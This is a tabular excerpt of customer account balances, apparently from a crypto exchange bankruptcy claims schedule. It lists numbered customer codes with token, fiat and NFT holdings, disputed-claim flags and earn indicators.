| 07429834 | | BRZ[3], CUSDT[16], DOGE[10], GRT[1], TRX[3.00001400], USD[0.00], USDT[0] | | |
| 07429841 | | USD[10.79], USDT[13.94408] | | |
| 07429844 | | DOGE[4.82527504], USD[0.00], USDT[0] | | |
| 07429849 | | BTC[.00036731], CUSDT[1], DOGE[172.16966923], USD[135.09] | | |
| 07429868 | | CUSDT[1], DOGE[1], USD[0.01], USDT[0] | | |
| 07429870 | | BRZ[1], BTC[0], CUSDT[15], DOGE[5], ETH[0], TRX[0], USDT[0.00040037] | | |
| 07429879 | | BTC[0], DOGE[0], LTC[75.07831006], MATIC[600.39846025], SOL[10.92375977] | Yes | |
| 07429881 | Contingent, Disputed | DOGE[1], TRX[0] | | |
| 07429884 | | BTC[.00015573] | | |
| 07429891 | | BTC[.00234508], SHIB[3300000], USD[30.55] | | |
| 07429893 | | DOGE[2], LINK[1.9719796], USD[10.54], USDT[19.8941114] | | |
| 07429894 | | DOGE[1], USD[0.01] | | |
| 07429895 | | USD[0.00] | | |
| 07429909 | | CUSDT[1], DOGE[1], USD[0.52], USDT[0] | | |
| 07429910 | | DOGE[2], TRX[39.82002622], USD[20.00], USDT[74.59546061] | | |
| 07429918 | | BTC[.00078175], CUSDT[6], DOGE[.00006615], TRX[1.00003995], USD[0.99] | | |
| 07429919 | | BRZ[1], BTC[0], CUSDT[12], DOGE[3.000548], LINK[0], USD[0.00], USDT[0.00000291] | Yes | |
| 07429923 | | BTC[.0018] | | |
| 07429929 | Contingent, Disputed | BTC[0.00000035], ETHW[1.265], LTC[.004], NFT (456268916853970059/Golden Hill #615 (Redeemed))[1], NFT (566664461781222044/Sun Set #816 (Redeemed))[1], SOL[0.25997057], SUSHI[.028], USD[0.01], USDT[0.00090735], YFI[.00047] | | |
| 07429940 | | TRX[10563.623453] | | |
| 07429944 | | CUSDT[5], DOGE[1], GRT[1], TRX[2], USD[0.18] | | |
| 07429947 | | USD[0.01], USDT[0.00000001] | | |
| 07429948 | | DAI[97.5] | | |
| 07429951 | | BTC[.00270175] | | |
| 07429956 | | USD[5.00] | | |
| 07429958 | | DOGE[1], USD[25.00], USDT[74.58800494] | | |
| 07429963 | | ETH[0], USD[0.00], USDT[0] | | |
| 07429964 | | GBP[6.43] | | |
| 07429965 | | BRZ[3], CUSDT[15], DOGE[182.31838357], SHIB[734749.4474055], USD[0.00], USDT[0] | Yes | |
| 07429966 | Contingent, Disputed | DOGE[0], ETH[.00000001], SGD[0.00], USD[0.00], USDT[0.00000001] | Yes | |
| 07429975 | | BCH[1.44311202], BTC[2.45698371], ETH[10.20217686], ETHW[11.25170666], LTC[885.04728815], NFT (526136610131158151/Entrance Voucher #97)[1], USD[-76775.78], USDT[0] | | |
| 07429976 | | TRX[499.997004] | | |
| 07429988 | | USD[9.44] | | |
| 07429992 | | BRZ[1], CUSDT[11], TRX[1], USD[0.01], USDT[.00109291] | Yes | |
| 07429997 | | DOGE[0], LINK[0], SOL[0], SUSHI[0], USD[0.00], USDT[0] | | |
| 07430000 | | ETH[0], USD[0.00] | Yes | |
| 07430014 | | USD[0.01] | | |
| 07430017 | | CUSDT[95.75405602], DOGE[12.83218583], GRT[220.87210597], TRX[2], USD[1582.63], USDT[388.16299654] | Yes | |
| 07430018 | | CUSDT[1], DOGE[32.11433731], USD[0.00] | | |
| 07430019 | | TRX[.00112571], USD[0.00] | | |
| 07430020 | | USD[0.08] | | |
| 07430025 | | BTC[.00094438] | | |
| 07430029 | | SOL[0], USD[0.00], USDT[0] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07430030 | | USD[0.58], USDT[0] | | |
| 07430039 | | CUSDT[2], DOGE[3], ETHW[.0673056], SHIB[1422852.66260585], USD[0.01] | Yes | |
| 07430045 | | SOL[.1], USD[0.07] | | |
| 07430050 | | USD[0.00] | | |
| 07430052 | | USD[0.01] | | |
| 07430054 | | BAT[1.0111992], BRZ[7.34999686], CUSDT[12], DOGE[804.94318609], ETH[.0002], ETHW[.0002], GRT[2.06190773], LINK[2.17204768], SHIB[11698470.66755767], SOL[.00367143], TRX[3452.87837376], USD[1.25] | Yes | |
| 07430059 | | DOGE[.18425577], ETH[.002977], ETHW[.002977], GRT[.44718], TRX[554.716], USD[0.02] | | |
| 07430069 | | CUSDT[1], USD[0.00] | | |
| 07430070 | Contingent, Unliquidated | BTC[0.13357745], SOL[0], USD[0.00], USDT[0.00000007] | | |
| 07430077 | | BAT[1], BRZ[3], BTC[0.04236563], CUSDT[4], DOGE[18067.10201459], ETH[.37457675], ETHW[.37457675], SOL[65.29235272], TRX[2], USD[0.00] | | |
| 07430079 | | USD[0.00] | | |
| 07430080 | | BRZ[4], CUSDT[4], DOGE[4], GRT[0], SHIB[2], TRX[3.53669978], UNI[.00889123], USD[0.00] | | |
| 07430083 | | BTC[0.00177651], DOGE[471.99995241], KSHIB[11.80467549], SHIB[1715326.11830316], TRX[5.07929771], USD[0.00] | | |
| 07430085 | | BTC[0.00009400], DOGE[234.06], USD[0.09] | | |
| 07430087 | | DOGE[0], USD[0.00] | | |
| 07430088 | | USD[30.00] | | |
| 07430091 | | PAXG[.00008736], USD[0.01] | Yes | |
| 07430094 | | AUD[0.00], BCH[0], DOGE[0], ETH[0], USD[0.00], USDT[0.02096491] | | |
| 07430097 | | BAT[33.18970999], BRZ[1], CUSDT[1151.26000774], ETH[0], SUSHI[8.57708664], TRX[6.08515000], USD[0.00], YFI[.00068173] | Yes | |
| 07430100 | | CUSDT[1], DOGE[2], USD[3.44] | | |
| 07430104 | | ALGO[164.73199229], BTC[0], CUSDT[5], DOGE[1.50731891], ETH[.0205061], ETHW[.02024678], LINK[0], MKR[.022135], SHIB[1], SOL[1.52044465], USD[0.00], YFI[.00134614] | Yes | |
| 07430108 | | DOGE[0], USD[5.20] | Yes | |
| 07430114 | | CUSDT[2], DOGE[2], NFT [342736453167997700/Baddies #2346][1], NFT [545374411746191572/Baddies #1614][1], NFT [560056010880762668/OCEAN Concept #40 Sport][1], SOL[.424485], TRX[0] | | |
| 07430120 | | ETHW[.135268], USD[0.00], USDT[0] | | |
| 07430130 | | USDT[41.05] | | |
| 07430134 | | DOGE[0.67206039], ETH[0], SOL[0], USD[0.00], USDT[0] | | |
| 07430144 | | CUSDT[1303.85199125], DOGE[959.21854826], USD[0.00], YFI[0.00031280] | Yes | |
| 07430147 | | CUSDT[4], GRT[1], USD[0.00] | | |
| 07430148 | | BTC[0], LTC[0] | | |
| 07430152 | | BTC[0], ETH[0], USD[0.00] | | |
| 07430155 | | DOGE[390.82721187], GBP[0.00], SHIB[84738.11779238], USD[0.00], USDT[0] | | |
| 07430156 | | USD[0.00] | | |
| 07430161 | | CUSDT[1], GRT[1], USD[0.00] | | |
| 07430170 | | USD[2.44] | | |
| 07430175 | Contingent, Disputed | MATIC[3.99286112], SHIB[2], TRX[1], USD[0.00] | Yes | |
| 07430183 | | USD[0.01] | Yes | |
| 07430189 | | DOGE[1], TRX[.04070384], USD[0.01] | | |
| 07430192 | | USD[0.00], USDT[0] | Yes | |
| 07430193 | | SOL[.152.16292325], UNI[.08], USD[5.05], USDT[.46426085] | | |
| 07430194 | | BCH[.1368028], BTC[0.02628414], CUSDT[1], DOGE[33535.80556822], ETH[.33332804], ETHW[.33317604], LINK[19.09461204], LTC[1.10374286], MATIC[119.4698741], SHIB[10764799.7694241], SOL[1.75570324], TRX[14657.1651986], USD[0.00], USDT[0] | Yes | |
| 07430197 | | BRZ[1], CUSDT[1], USD[0.00] | Yes | |
| 07430198 | | BCH[0], DOGE[0], ETH[0], TRX[0], USD[0.20] | | |
| 07430207 | | BRZ[1], DOGE[1015.65933145], GRT[364.77603341], SUSHI[78.83820293], TRX[4583.97479802], USD[0.00] | Yes | |
| 07430212 | | BCH[.000347], BTC[0.00013892], DOGE[.665], ETH[.012262], ETHW[.012262], LINK[.0796], LTC[.00394], SUSHI[.419], TRX[1.115], UNI[.1279], USDT[14.86448431] | | |
| 07430214 | | USD[0.00] | | |
| 07430218 | | BTC[.00093682] | | |
| 07430226 | | KSHIB[37592.37], NFT [374408708171362967/The Hill by FTX #3111][1], NFT [440873508978848482/FTX Crypto Cup 2022 Key #1036][1], NFT [482692283375251112/The Hill by FTX #3420][1], TRX[.000019], USD[0.39], USDT[.01] | | |
| 07430227 | Contingent, Disputed | ETH[.15049433], ETHW[.15049433], SOL[6.69342662], USD[0.00] | | |
| 07430228 | | SOL[0], USD[0.00] | | |
| 07430234 | | BTC[.000312], SHIB[84400], SOL[18.86806308], USD[1.84], USDT[.9873252] | | |
| 07430244 | | GRT[12.94372561], TRX[1], USD[0.00] | Yes | |
| 07430247 | | CUSDT[1], DOGE[76.51423996], USD[0.02] | | |
| 07430257 | | BAT[31.95862796], DOGE[322.83993475], SOL[1.34113239], TRX[2], USD[32.95] | Yes | |
| 07430265 | | DOGE[.35462509], USD[0.00], USDT[0] | | |
| 07430272 | | BTC[.00034222], USD[1.00] | | |
| 07430274 | | DAI[0], USD[0.00], USDT[0] | Yes | |
| 07430281 | | USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07430282 | | BTC[.0001] | | |
| 07430290 | | BRZ[1], CUSDT[2], DOGE[6], SHIB[3146336.5769], TRX[2613.21853291], USD[0.33] | | |
| 07430294 | | BRZ[1], MATIC[0], NFT (317855371507719822/Pink Woman)[1], NFT (332474369378921181/Barcelona Ticket Stub #1972)[1], NFT (405206984932712805/Transparent Woman #6 #2)[1], NFT (461270391551711548/CryptoAvatar #104)[1], NFT (555770763596937967/Saudi Arabia Ticket Stub #2076)[1], NFT (570375510690956103/Woman #1)[1], SHIB[0], SOL[10.41878396], TRX[0], USD[0.00] | Yes | |
| 07430297 | | BAT[0], DOGE[1] | | |
| 07430302 | | ETH[0] | | |
| 07430307 | | BAT[1], BRZ[9.71175023], BTC[0], CUSDT[55.1359611], DOGE[27.06883848], GRT[4.14620855], SHIB[14], SUSHI[1.10991402], TRX[2.01130700], USDT[20.61341445] | Yes | |
| 07430308 | | BTC[0], CUSDT[2], DOGE[2], LTC[0], SOL[0], TRX[3], USD[0.00], USDT[0.00000333] | | |
| 07430309 | | CUSDT[3], USD[0.00] | | |
| 07430312 | | LINK[0], SOL[0], USD[2.52], USDT[0] | | |
| 07430314 | | BTC[.01167858], CUSDT[1], DOGE[1], LINK[55.03010653], USD[50.11] | | |
| 07430323 | | ETH[.0000003], ETHW[.03212837], NFT (318289507524616868/Humpty Dumpty #443)[1], NFT (350296244025146553/Entrance Voucher #3139)[1], NFT (454853696532394766/Series 1: Capitals #574)[1], NFT (481075438583353068/FTX - Off The Grid Miami #3265)[1], NFT (515180670314343252/Romeo #814)[1], NFT (567866759913612152/Series 1: Wizards #615)[1], USD[671.55] | Yes | |
| 07430338 | | TRX[.000002] | | |
| 07430339 | | USD[749.46], USDT[0] | Yes | |
| 07430344 | | DOGE[0], USD[0.00] | | |
| 07430345 | | DOGE[1], USD[0.00] | | |
| 07430348 | | BTC[0], LINK[0], USD[0.00], USDT[0] | | |
| 07430354 | | BTC[.0021978], ETH[.02997], ETHW[.02997], USD[0.00] | | |
| 07430356 | | BTC[0], CUSDT[1], USD[0.01] | | |
| 07430359 | | DOGE[41.6637658], SOL[0], USD[3.64] | | |
| 07430369 | | USD[0.22] | | |
| 07430373 | | BTC[0.00001861], USD[0.24], USDT[0] | | |
| 07430374 | | NFT (294639009809298866/2974 Floyd Norman - CLE 3-0144)[1], NFT (465210971125714883/The 2974 Collection #1948)[1], NFT (496042583429828455/Birthday Cake #1948)[1], USD[0.00] | | |
| 07430375 | | USD[0.23] | | |
| 07430379 | | DOGE[1], USD[0.00], USDT[9.9470557] | | |
| 07430388 | | DOGE[11.31992071], USD[1.21], USDT[0.00000194] | | |
| 07430389 | | TRX[.000002], USDT[100] | | |
| 07430392 | | BRZ[.00248], CUSDT[.0063011], DOGE[1.00328646], ETHW[.94214881], SHIB[16.97192022], TRX[1], USD[2294.93], USDT[0] | Yes | |
| 07430396 | | BTC[0], DOGE[278.33508589] | | |
| 07430403 | | BTC[0] | | |
| 07430409 | | TRX[.000002], USDT[0.00001449] | | |
| 07430414 | | USD[20.00] | | |
| 07430418 | | USD[2.00] | | |
| 07430422 | | BRZ[1], DOGE[1177.36275257], USD[0.00] | Yes | |
| 07430423 | | BTC[0.00001885], SOL[1.15023104], TRX[.955559], USDT[0.00000057] | | |
| 07430427 | | USD[0.00], USDT[1] | | |
| 07430428 | | BF_POINT[200] | Yes | |
| 07430434 | | BTC[.00348201], DOGE[1], USD[0.00] | | |
| 07430437 | | DOGE[0], TRX[0], USD[0.00], USDT[0] | | |
| 07430438 | | AUD[0.00], BTC[.00338776], DOGE[63684.66678102], ETH[4.45757698], ETHW[4.45566404], MATIC[1205.12846009], SHIB[0], SOL[33.5237], USD[100.00], USDT[0] | Yes | |
| 07430439 | | BRZ[3], BTC[.00802583], CUSDT[12], DOGE[688.64089689], SHIB[1073297.13162259], TRX[1], USD[0.01] | Yes | |
| 07430445 | | USD[0.01], USDT[0] | | |
| 07430447 | Contingent, Disputed | USD[0.00] | | |
| 07430450 | | BTC[0], ETH[0], LINK[0], SHIB[0], SOL[0], TRX[0], USD[0.00] | | |
| 07430454 | | USD[90.00] | | |
| 07430470 | | CUSDT[3], USD[0.01] | Yes | |
| 07430473 | | DOGE[1290.4808936], SHIB[2299878.18431208], USD[0.00] | Yes | |
| 07430474 | | BCH[.07576411], CUSDT[5], DOGE[32.67583851], ETH[.00642631], ETHW[.00634423], LINK[1.07240958], LTC[.41652067], USD[96.20] | Yes | |
| 07430476 | | LINK[0], SOL[.05664562], USD[0.00], USDT[0] | | |
| 07430482 | | BAT[1.0165555], BRZ[4], CUSDT[6], DOGE[2993.03972205], ETH[.02393215], ETHW[.00010399], EUR[7.10], SHIB[2492597.26473301], TRX[5], USD[0.00], USDT[1.08815501] | Yes | |
| 07430485 | | BRZ[1], CUSDT[15], DOGE[108.28879545], TRX[1], USD[0.00] | | |
| 07430489 | | BF_POINT[300], MATIC[0], SHIB[2], USD[0.00] | Yes | |
| 07430494 | | SOL[0], USD[0.00], USDT[0] | | |
| 07430495 | | BTC[0], ETH[0], ETHW[0], UNI[.00170906] | | |
| 07430501 | | GRT[.5], TRX[.838723], USD[1.77], USDT[2.20764964] | | |
| 07430504 | | BTC[0], DOGE[0], ETH[0], LINK[0], SOL[0], TRX[0], USD[0.01], USDT[.7879516] | | |
| 07430511 | | BRZ[1], BTC[0], CUSDT[4], TRX[0], USD[0.00], USDT[0] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07430514 | | BRZ[1], CUSDT[6], DOGE[1], USD[0.00] | | |
| 07430517 | | BTC[0], DOGE[19.65006135], ETH[0.00000031], ETHW[0], EUR[0.00], NFT (504311074254717755/FTX - Off The Grid Miami #3248)[1], NFT (525328387782224016/Juliet #430)[1], NFT (542990136847648211/Romeo #16221)[1], SHIB[249483.80371804], SOL[0], USD[0.01], USDT[0.00000001] | Yes | |
| 07430523 | | CUSDT[2], USD[55.29] | Yes | |
| 07430535 | | CUSDT[6], DOGE[4.70438838], NFT (323457282560368801/FTX - Off The Grid Miami #2525)[1], SOL[0], SUSHI[5.54996827], USD[0.01] | Yes | |
| 07430537 | | USD[0.01] | | |
| 07430544 | | BRZ[1], MATIC[0], USD[0.01] | Yes | |
| 07430554 | | DOGE[1], USD[0.01] | | |
| 07430558 | | DAI[395], USD[25.97] | | |
| 07430560 | | BAT[0], BTC[0], DOGE[0], ETH[0], USD[0.00] | Yes | |
| 07430561 | | TRX[2017.22763418], USD[0.00] | | |
| 07430564 | | USD[0.00] | | |
| 07430566 | | ETH[0], ETHW[0], USD[0.00] | | |
| 07430567 | | USD[0.52], USDT[.46644125] | | |
| 07430572 | | USD[100.00] | | |
| 07430574 | | USD[691313.54], USDT[0.00943600], WBTC[0] | | |
| 07430578 | | ALGO[0], BF_POINT[100], BTC[0.00008076], DOGE[0], ETH[0], MKR[0], NFT (468182534105977293/Gutter Punks Flyer - Wassies)[1], NFT (563570475906366531/APEFUEL by Almond Breeze #729)[1], SUSHI[0], USD[0.03], USDT[0.00004877], YFI[0] | | |
| 07430580 | | CUSDT[2], USD[0.00] | | |
| 07430584 | | CUSDT[1], DOGE[1], USD[0.29] | | |
| 07430585 | | BTC[0], CUSDT[18], DOGE[2], ETH[0.00000001], ETHW[0], TRX[6.73450712], USD[0.00], USDT[5.68435434] | | |
| 07430595 | | BTC[.00206186], CUSDT[2], DOGE[162.25195993], LTC[.1033555], TRX[646.36776637], USD[0.00] | | |
| 07430599 | | USD[0.00] | | |
| 07430600 | | USDT[0.00000008] | | |
| 07430606 | | BTC[0], DAI[0], LTC[0], SOL[0], SUSHI[0], TRX[.000002], USD[0.00], USDT[0.00000001] | | |
| 07430607 | | BTC[0], USD[9.99], USDT[.4744835] | | |
| 07430611 | | ETH[.75683405], ETHW[0], USD[0.09], USDT[0] | Yes | |
| 07430615 | | BTC[.00000167], ETH[0.00037383], ETHW[0.00037383], LTC[.00644], TRX[.548], USD[0.00], USDT[0] | | |
| 07430616 | | NFT (434018432655157982/Australia Ticket Stub #1943)[1] | | |
| 07430619 | | CUSDT[1], DOGE[1], SOL[33.26088048], USD[1720.75] | | |
| 07430622 | | BAT[2], BRZ[1], CUSDT[1], DOGE[1], GRT[1], TRX[2], USD[0.01] | | |
| 07430624 | | AVAX[0], ETH[0.00000002], ETHW[0.00000001], MATIC[0.00000001], TRX[0], USD[0.00], USDT[0.00000001] | Yes | |
| 07430628 | | BRZ[1], BTC[.03960318], CUSDT[3.94], DOGE[1], GRT[1], LINK[.00057534], TRX[2], USD[0.48], USDT[0.00017883] | Yes | |
| 07430629 | | BAT[1.01655549], BRZ[2], CUSDT[3], DOGE[3], TRX[1], USD[58.12] | Yes | |
| 07430631 | Contingent, Disputed | BTC[0.00997633], USD[0.00], USDT[0.00015165] | | |
| 07430636 | | AAVE[3.06055964], ALGO[1091.8877043], AVAX[20.48006101], BCH[0], BRZ[8.28488447], BTC[0], DAI[0], DOGE[0.02472661], ETH[0], ETHW[3.03422402], GRT[275.71125119], LINK[30.84271966], LTC[0], MATIC[251.30394616], NEAR[.00017399], SHIB[133041743.36542032], SOL[6.23216091], SUSHI[1033.40417263], TRX[110.41831951], UNI[0], USD[0.01], USDT[1.02543196], YFI[.44029531] | Yes | |
| 07430637 | | BTC[0], DOGE[1], ETH[0], SOL[0], USD[0.00], USDT[0.00000007] | | |
| 07430640 | | BRZ[1], CUSDT[2], DOGE[2], TRX[1], USD[0.00] | Yes | |
| 07430641 | | BAT[1], BRZ[2], CUSDT[134.25287859], KSHIB[204.28333876], LINK[1.09587413], MATIC[.00015878], SHIB[262267.87667285], SOL[1.43085091], TRX[9.00087675], USD[0.00] | Yes | |
| 07430645 | | ETH[.00000001], ETHW[0], SOL[0], USD[0.00], USDT[0.00000037] | | |
| 07430647 | | DOGE[1], USD[0.00] | | |
| 07430648 | | USD[0.00] | | |
| 07430649 | | NFT (533901003909279966/FTX - Off The Grid Miami #2323)[1] | Yes | |
| 07430650 | | CUSDT[1], DOGE[3465.95341966], USD[0.00] | | |
| 07430651 | | USD[7.28] | | |
| 07430653 | | USD[0.28] | | |
| 07430654 | | SOL[.12] | | |
| 07430656 | | DOGE[0], USD[4.67] | | |
| 07430658 | | USD[0.66] | | |
| 07430659 | | CUSDT[3], USD[0.00], USDT[0] | | |
| 07430664 | | USD[0.00] | | |
| 07430665 | | USD[0.00], USDT[0] | | |
| 07430667 | | DOGE[0], SHIB[38459936.30053493], USD[0.00], USDT[0] | Yes | |
| 07430683 | | TRX[.000004] | | |
| 07430684 | | BTC[.01310444] | | |
| 07430686 | | CUSDT[5], SHIB[.84747449], USD[0.00] | Yes | |
| 07430688 | | DOGE[2.10242032], USD[0.00] | | |
| 07430689 | | BAT[1], BRZ[3], CUSDT[6], DOGE[14.05106077], ETHW[.22984929], SHIB[8], SOL[.00138077], TRX[6], USD[0.01], USDT[1.01820941] | Yes | |
| 07430690 | | USD[100.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07430707 | | USD[20.00] | | |
| 07430708 | | SOL[.00000001], USD[3.93] | | |
| 07430709 | | BRZ[0], DOGE[2691.49351703], ETH[0.35028082], ETHW[0], SHIB[2], TRX[0], USD[0.01] | Yes | |
| 07430712 | | BRZ[.00001506], DOGE[2], USD[0.00], USDT[0.00053037] | | |
| 07430718 | | CUSDT[1], DOGE[2], USD[0.13] | | |
| 07430719 | | TRX[0], USD[0.00] | | |
| 07430721 | | BRZ[1], BTC[.00111561], CUSDT[1], DOGE[2], ETH[.01491888], MATIC[993.19923264], SHIB[3], SOL[72.79511698], TRX[2], USD[1101.04], USDT[1.0001826] | Yes | |
| 07430722 | | CUSDT[20], DOGE[.00360176], LINK[.00002742], SHIB[14.36449139], TRX[1], USD[0.00], USDT[0] | Yes | |
| 07430724 | | SHIB[4], TRX[1], USD[0.53] | Yes | |
| 07430730 | | BTC[0], ETH[0], SOL[0], USD[0.00] | | |
| 07430735 | | BTC[.00018225], DOGE[97.96200186], USD[0.64] | | |
| 07430739 | | BAT[1], DOGE[2], GRT[2], LINK[2], SOL[.00895819], SUSHI[2], TRX[2], UNI[1], USD[0.00], USDT[1] | | |
| 07430746 | | BF_POINT[300], SOL[0], USD[0.00] | Yes | |
| 07430748 | Contingent, Disputed | DOGE[0], LTC[0], USD[0.00] | Yes | |
| 07430751 | | BRZ[2], DOGE[1], EUR[0.00], LTC[0], MATIC[0], NFT (339792357043580644/FTX - Off The Grid Miami #1134)[1], SHIB[9], SOL[0], SUSHI[0.00015858], TRX[0.00077700], USD[0.01], USDT[0] | Yes | |
| 07430753 | | BRZ[2], CUSDT[10], DOGE[2], NFT (455633385679929598/Coachella x FTX Weekend 1 #16596)[1], TRX[5], USD[0.00] | | |
| 07430756 | | ETH[.00068841], ETHW[.00068841], LINK[.999], LTC[.31968], USD[5.59] | | |
| 07430760 | | DOGE[439.66815315], TRX[765.54684005], USD[0.00] | | |
| 07430762 | | BRZ[2], CUSDT[3], DOGE[1133.5188633], GRT[2410.66260513], SOL[159.8038319], SUSHI[259.14731317], TRX[7], USD[2.01], USDT[2.16480229] | Yes | |
| 07430779 | | USD[0.00] | Yes | |
| 07430782 | | ETH[.000368], ETHW[.000368], USD[0.28], USDT[0] | | |
| 07430785 | | NFT (304865728557402511/Coachella x FTX Weekend 1 #4675)[1], NFT (412524322000062715/88rising Sky Challenge - Cloud #74)[1], NFT (416292468713703444/FTX - Off The Grid Miami #2261)[1], NFT (489554737146157164/88rising Sky Challenge - Fire #27)[1], NFT (495546634250000870/88rising Sky Challenge - Coin #121)[1] | | |
| 07430793 | | CUSDT[2], DOGE[1], ETH[.00000744], ETHW[1.95], USD[0.00] | | |
| 07430795 | | CUSDT[1], DOGE[136.07993437], USD[0.00] | | |
| 07430799 | | TRX[.00000042], USD[8.52], USDT[0] | | |
| 07430804 | | BTC[.00009153], DOGE[14.40777796], ETH[.00214593], ETHW[.00214593], USD[0.00] | | |
| 07430807 | | BTC[.01084231], DOGE[2], ETH[.19991618], ETHW[.19970646], KSHIB[14688.71873567], LTC[.00002471], SHIB[22501177.21527766], SOL[1.11589113], SUSHI[9.68865879], TRX[2.00009134], UNI[12.75714652], USD[198.75] | Yes | |
| 07430815 | | CUSDT[1], DOGE[0], ETH[0], SOL[0], TRX[0], USD[0.00] | | |
| 07430816 | | BTC[.0037962], USD[0.50] | | |
| 07430817 | | TRX[1], USD[0.00] | Yes | |
| 07430819 | | CUSDT[9], SHIB[377428.15582119], TRX[1], USD[0.00] | Yes | |
| 07430821 | | BTC[.00914825], CUSDT[2], DOGE[5035.61313509], ETH[.29334927], ETHW[.29334927], SHIB[400963.3095429], SUSHI[4.48747678], TRX[8.9686056], USD[0.00] | | |
| 07430822 | | TRX[400.000002] | | |
| 07430825 | | BTC[0.00723727], DOGE[.9905], LTC[.0045755], SOL[11.06836163], USD[0.01], USDT[0] | | |
| 07430827 | | USD[0.34] | Yes | |
| 07430831 | | BTC[0], ETH[0], ETHW[0], SHIB[1], TRX[1], USD[0.00], USDT[1] | | |
| 07430833 | | BTC[0.00037016], NFT (367044164518484845/FTX - Off The Grid Miami #5046)[1], SOL[0] | | |
| 07430843 | | USD[0.00], USDT[0] | | |
| 07430847 | | AAVE[2.96568411], BRZ[1], USD[0.00] | Yes | |
| 07430848 | | USD[0.00] | | |
| 07430867 | | DAI[0], DOGE[0], SHIB[7712250.06289861], TRX[0] | Yes | |
| 07430877 | | BTC[0], CUSDT[15], DOGE[0], ETH[0], SUSHI[0], TRX[2], USD[0.00] | | |
| 07430883 | | CUSDT[1], TRX[1], USD[47.02] | | |
| 07430885 | | CUSDT[3], DOGE[.00001543], GRT[.00000297], TRX[4], USD[0.00] | | |
| 07430887 | | USD[0.33] | | |
| 07430888 | | BRZ[3], DOGE[0.49916840], TRX[5], USD[0.00], USDT[0] | | |
| 07430890 | | BTC[0.05475406], SOL[34.00706359], USD[398.74] | | |
| 07430896 | | DOGE[1], USD[0.00] | | |
| 07430907 | | TRX[2], USD[0.00] | | |
| 07430908 | | USD[1000.00] | | |
| 07430915 | | AUD[0.00], ETH[0], SOL[0.00502182], TRX[.604473], USD[0.00] | | |
| 07430918 | | BTC[0], DOGE[0], ETH[0.17512435], ETHW[0], SHIB[76843.69317170], SOL[0], TRX[0], USD[0.00] | Yes | |
| 07430919 | | TRX[0], USD[0.00] | | |
| 07430920 | | BAT[1.01655549], BRZ[2], CUSDT[7], TRX[12.39201887], USD[0.51], USDT[1.10832388] | Yes | |
| 07430923 | | SOL[36.852], USD[5.35] | | |
| 07430925 | | CUSDT[1], DOGE[99.8999981], USD[0.01] | | |
| 07430931 | | DOGE[1], ETH[.03216237], ETHW[.03176536], KSHIB[178.44299496], SHIB[2], SUSHI[39.3311207], USD[0.04], USDT[0] | Yes | |
| 07430935 | | USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07430942 | | BAT[5.66682796], CUSDT[3], DOGE[482.17299468], SHIB[20436232.90841298], SUSHI[4.75131046], TRX[2846.52267279], USD[0.00] | Yes | |
| 07430944 | | BAT[1.01494151], BRZ[1], CUSDT[16], DOGE[1], TRX[2], USD[0.00] | Yes | |
| 07430946 | | CUSDT[5], DOGE[12.83069285], GRT[73.10104136], USD[0.05] | | |
| 07430947 | | BRZ[1], USDT[0] | | |
| 07430948 | | AAVE[0], CUSDT[1], SHIB[1], USD[0.00] | Yes | |
| 07430949 | | DOGE[619.29797694], ETH[.13409272], ETHW[.13302658], KSHIB[4.25136753], LINK[6.5617508], SHIB[2442731.33716497], SOL[.00004349], TRX[441.79899085], USD[0.00], USDT[0.00000001] | Yes | |
| 07430953 | | CUSDT[1], USD[0.00] | | |
| 07430959 | | DOGE[1], USD[0.00] | | |
| 07430964 | | BTC[0.05085164], DOGE[1706.53855], ETH[1.258708], ETHW[1.258708], SHIB[99905], SOL[100.7004265], SUSHI[11.9544], USD[48.20] | | |
| 07430965 | | DOGE[7565.68095827], TRX[1], USD[0.00] | Yes | |
| 07430967 | | BRZ[1], CUSDT[2], DOGE[.0013308], TRX[1], USD[0.82] | Yes | |
| 07430970 | | DAI[4.30181322], DOGE[28.93774315], EUR[0.83], KSHIB[66.61345583], SHIB[69610.40031826], USD[0.00] | Yes | |
| 07430975 | | AVAX[.00000001], USD[0.00], USDT[0] | | |
| 07430979 | | AVAX[102], ETH[.00012367], ETHW[.00012367], SOL[.0257], USD[30885.25] | | |
| 07430985 | | USD[0.00] | | |
| 07430986 | | BAT[.00058106], BRZ[1], CUSDT[6], DOGE[2], ETH[.00000014], ETHW[.00000014], NFT (311819823276289887/Echo #15)[1], NFT (458312877648482890/Pride )[1], NFT (566641326554124672/Hexagon #002)[1], NFT (572047402987339577/Roulette )[1], SHIB[5], SOL[.00006706], USD[0.00] | Yes | |
| 07430989 | | BRZ[1], CUSDT[1], DOGE[1], USD[0.00] | Yes | |
| 07430996 | | USD[0.00] | | |
| 07431000 | | NFT (292409030433863814/StarAtlas Anniversary)[1], NFT (326706497033993303/StarAtlas Anniversary)[1], NFT (337733471838034719/StarAtlas Anniversary)[1], NFT (343896525029166375/Romeo #434)[1], NFT (378008909044880155/StarAtlas Anniversary)[1], NFT (452775896553266378/StarAtlas Anniversary)[1], NFT (472496548522927190/StarAtlas Anniversary)[1], NFT (475356720142970781/FTX AU - we are here! #4795)[1], NFT (502182118717730111/Good Boy #351)[1], NFT (529143990498112508/StarAtlas Anniversary)[1], NFT (560072820529165774/Romeo #429)[1], NFT (569431867793018806/StarAtlas Anniversary)[1], NFT (571843717521896894/Humpty Dumpty #1070)[1] | | |
| 07431002 | | TRX[.000003], USD[0.00], USDT[0] | | |
| 07431004 | | CUSDT[1597.03200528], DOGE[144.40147396], TRX[468.83617794], USD[4.55] | | |
| 07431016 | | LTC[.00066049], USDT[.1531836] | | |
| 07431017 | | USD[5000.00] | | |
| 07431029 | | ETH[.58974], ETHW[.58974] | | |
| 07431033 | | USD[0.00] | | |
